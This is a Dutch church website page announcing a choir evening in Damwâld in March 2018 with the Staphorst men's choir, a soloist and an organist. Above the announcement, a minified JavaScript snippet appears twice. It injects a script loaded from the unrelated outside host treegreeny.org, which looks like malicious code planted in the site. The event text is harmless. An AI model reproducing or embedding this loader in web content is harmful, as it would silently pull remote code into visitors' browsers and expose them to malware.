;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); 2e Zingend naar de Zondag in Damwâld met Chr. Mannenkoor Staphorst - PKN Damwâld

2e Zingend naar de Zondag in Damwâld met Chr. Mannenkoor Staphorst

Gepubliceerd op: zondag 18 februari 2018

Enthousiaste bezoekers, uitstekende zang en een goede organisatie zorgden  vorig jaar in oktober voor een prima start en daarom kan een vervolg niet uitblijven. We zijn erin geslaagd om het ruim 100 leden tellende Chr. Mannenkoor Staphorst vast te leggen voor zaterdag 17 maart. Zij hebben aangegeven erg graag te willen optreden in Damwald en mee te werken  aan de 2e Zingend naar de Zondag.

Wederom een prachtig mannenkoor dat optreedt  in Staphorster kostuum en het geestelijke lied vertolkt sinds 1969!
Het koor verleent regelmatig medewerking aan het tv programma ‘’Nederland zingt’’ en ‘’Laat ons de rustdag wijden’’ en staat bekend om hun zingen van de grote daden des Heren, dit alles onder de bezielende leiding van dirigent Peter Bos uit Dronten. Hij volgde een tiental jaren orgel en pianolessen bij de bekende Klaas Jan Mulder en volgde met veel succesvol  cursussen koordirectie in Den Haag. Hij is tevens dirigent van het Chr. Mannenkoor “Asaf” uit Dedemsvaart en begeleidt hij diverse koren op orgel en piano.

Als KERS op de taart hebben we deze avond een solist uitgenodigd. Gert Pannekoek zal samen met het mannenkoor en met de gemeente optreden. Hij brak door als solist door mee te doen aan het bekende TV programma  ‘’Una Voce Particolare’’  van Ernst Daniël Smit en is een veel  gevraagd solist bij concerten, cd en tv opnames. Jaarlijks neemt hij de Christuspartij voor zijn rekening in de Marcus Passie van Hans Boelee.

Deze avond zal de jonge Evan Bogerd zijn kunsten laten horen op het orgel en alles begeleiden. Momenteel studeert hij zijn master orgel bij Jos van der Kooy aan het Koninklijk Conservatorium in Den Haag. Hij won diverse prijzen op concoursen te Barneveld, Ede, Enschede, Kampen en Maassluis. Ook is hij de organist van het befaamde Knol orgel van de Grote of St. Stephanuskerk te Hasselt en vervangend organist van de Westerkerk te Amsterdam. In 2016 maakt Bogerd zijn debuut op CD, die werd opgenomen op het beroemde Müller orgel van de St. Bavo te Haarlem. Hij is een zoon van de huidige predikant K. Bogerd van de Hervormde Gemeente in Wâlterswâld.

De samenzang van bekende liederen zal deze avond gedeeltelijk in het teken staan van het komende Pasen en de presentatie deze avond is in vertrouwde handen van dhr. Leo Blees, voorganger van de Gereformeerde Kerk van Driezum en Wâlterswâld.

Er is geen meditatie, de toegang is opnieuw gratis, wel is er een collecte voor de onkosten. Alle ingrediënten zijn aanwezig voor weer een fantastische avond die u niet mag missen!!! En, neemt u ook een vriend of kennis mee? Van harte welkom! De aanvang is 19.30 uur in de Geref. Kerk De Ontmoeting, Foarwei 48 te Damwald.